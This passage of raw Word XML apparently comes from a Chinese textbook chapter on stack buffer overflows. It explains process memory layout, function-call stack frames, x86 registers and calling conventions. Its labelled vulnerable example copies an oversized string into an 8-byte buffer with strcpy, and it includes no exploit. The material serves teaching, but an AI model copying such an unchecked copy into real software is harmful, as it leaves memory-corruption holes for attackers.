        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.1 栈的数据结构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F3F8B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在操作系统中一个正在执行的进程一般可以大致分为以下4个部分：代码区、数据区、堆区、栈区。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E99C90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（1）代码区：这个区域存储着可执行的二进制机器码，这些是处理器要执行的代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC1894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（2）数据区：用于存储全局变量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BD299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lastRenderedPageBreak/>
        <w:t>（3）堆区：进程可以向堆区动态的申请一个指定大小的内存区用于存储数据，并在用完之后归还给堆区，动态分配和回收是堆区的特点。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF043F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（4）栈区：用于动态的存储函数之间的调用关系，以保证被调用函数在返回时栈恢复到调用函数的环境，继续执行下一个指令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626B4B1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栈区是一个数据结构，一种先进后出的数据表。栈中最常见的操作：PUSH（入栈）、POP（出栈）；标识信息有：TOP（栈顶），BASE（栈底）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492CA9C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（1）PUSH：在栈顶为栈增加一个元素，并且栈顶TOP会指向最新加入的元素。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51799A1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（2）POP：从栈顶取出一个元素，栈顶TOP会指向下一个元素。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4118848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（3）TOP：标识栈顶的位置，随着PUSH和POP的操作而变化。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A0D64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（4）BASE：标识栈底，防止栈空后，再次执行POP操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094A4F12"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BBE05AA" wp14:editId="73EC42F1">
            <wp:extent cx="4043548" cy="262786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1">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4067963" cy="2643735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C82C20"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.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进程内存中的栈</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54517F2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如图所示，程序被加载后，执行文件中的代码会放到.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>代码区，处理器会逐条命令执行，指令需要的操作数在内存中时，就需要到.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>stack</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>区中去获取，如果程序需要新的动态空间去存储数据，则需要向堆申请，一般函数内的局部变量放到栈中，全局变量和静态变量放到数据区中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55879F23" w14:textId="5F6A9E21" w:rsidR="002C1A85" w:rsidRPr="000012A0" w:rsidRDefault="002C1A85" w:rsidP="000012A0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="003D7125">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.2 函数调用过程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF0D36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栈区由系统自动维护，用于实现高级语言中函数的调用过程，对于类似C语言这样对栈的PUSH、POP都是透明的，由编译器编译成汇编语言时才会将高级语言转换出这些操作，或者当直接编写汇编语言时程序员采用到这些对栈的操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EA565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接下来看一下调用函数时，栈空间内容的变化，先看如下代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FFAF4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lastRenderedPageBreak/>
        <w:t>代码2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>含有漏洞的示例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F44F46"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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3191FC68"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488D02A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AFunc(5,6);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AC0846"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return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C6617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7394D0C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int AFunc(int i,int j)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F19C93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0B483C7D"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>nt m=3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D45392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int n=4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AECB1D"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char szBuf[8]={0};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B2DCB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strcpy(szBuf,”This is a overflow buffer!”);//</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发送栈溢出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC9653D"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m=i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3DC76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n=j;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09187A9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return 8;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B23AC1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728E329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当调用AFunc</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(5,6)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时，汇编代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5437C03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代码2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>代码2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的部分汇编代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D5030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7BE1D43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push</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2198516D"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push</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7882A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call</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> _AFunc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093972D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7BF7C69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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B89C3C6"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_AFunc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F28832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push ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703B811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mov ebp,esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D47C7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sub esp,48h//</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为局部变量分配空间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B6C54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push ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BC1B6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push esi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C73FEA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lastRenderedPageBreak/>
        <w:t>push edi //</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>保存一些寄存器的值</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FC59E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w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AFunc中的其它指令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7410DC16"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pop</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>edi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D81F8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pop</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>esi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3EF28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pop</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEB3FD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add</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>esp,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>48h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FD25A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mov esp,ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759A259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pop ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A145AF"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ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FB220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下面的图展示了调用函数时栈空间的变化。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B54CC51"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49D0FEE0" wp14:editId="71CEC3CB">
            <wp:extent cx="4177617" cy="3111335"/>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png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4200147" cy="3128115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2F299A"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.4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>栈空间变化示意图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5BBB4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当调用AFunc</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(5,6)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时，CPU会从main函数区域跳转到AFunc函数对应的代码区域去执行代码，在执行AFunc函数中的功能代码之前，会先进行一些准备工作：保存调用者的执行环境、为此函数开辟一个栈空间用于存放局部变量等数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2BA34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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）保存调用者的环境：保存ESP、EBP、EBX等寄存器的值到栈空间，以便返回时可以恢复。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E24900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（2）通过sub指令改变ESP值，为函数中的局部变量开辟一段足够的栈空间来保存数据，同一份代码的不同变量对应的位置因编译器的不同而不同。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB601D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CPU在执行完AFunc后如何知道要返回的地址呢？原来，在执行call指令时将下一条</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>指令所在的地址存放到了图中EIP的所在的位置，而ret指令则是从栈顶弹出一个地址并跳转。当执行到AFunc函数中的ret指令时，栈顶恰好执向EIP，也就是返回地址，CPU也就知道要返回到哪里了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407219EE" w14:textId="19943302" w:rsidR="002C1A85" w:rsidRPr="000012A0" w:rsidRDefault="002C1A85" w:rsidP="000012A0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="003D7125">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.3 寄存器与函数栈帧</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7459A48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每一个函数独占自己的栈帧空间，当前正在运行的函数的栈帧总是在栈顶，有两个特殊的寄存器用于标识位于系统栈顶端的栈帧。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0A1D3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（1）ESP：栈指针寄存器，其内存放着一个指针，该指针永远指向系统栈最上面一个栈帧的栈顶。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5510CEE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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）EBP：基址指针寄存器，其内存放着一个指针，该指针永远指向系统栈最上面一个栈帧的底部。注意：栈帧底部只是属于正在执行的函数的栈帧的底部，而不是真正的栈底。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DF608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（3）EIP：下一个将要执行的指令的地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1486A2E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ESP和EBP之间的内存空间称为当前栈帧，在函数栈帧中一般有几个重要的信息：局部变量、栈帧状态信息（保存前栈帧的EBP，ESP可以计算得到恢复）、函数的返回地址。如下图所示，ESP和EBP一起维护了栈空间，当函数调用结束后，通过对两者的恢复，释放了被调用者占用的栈空间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C24A143"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="243A3C95" wp14:editId="6932E117">
            <wp:extent cx="4690548" cy="3509158"/>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png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4694743" cy="3512297"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="744B336F"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.5 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ESP和EBP的作用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04011257" w14:textId="69913EE5" w:rsidR="002C1A85" w:rsidRPr="000012A0" w:rsidRDefault="002C1A85" w:rsidP="000012A0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="003D7125">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.4 函数调用类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382949C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不同的操作系统、语言、编译器在实现函数调用时原理基本相同，但一些具体的调用约定还是有些区别的，包括：参数传递方式、是调用者还是被调用者恢复栈信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23003DA6"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表2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>函数调用类型表</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2765"/>
        <w:gridCol w:w="2765"/>
        <w:gridCol w:w="2766"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="7F6D9813" w14:textId="77777777" w:rsidTr="00621588">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B49C16D"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调用类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="378E4E50"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参数入栈顺序</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="695F1320"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平衡位置</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="2050ACF0" w14:textId="77777777" w:rsidTr="00621588">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A700EDC"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_</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
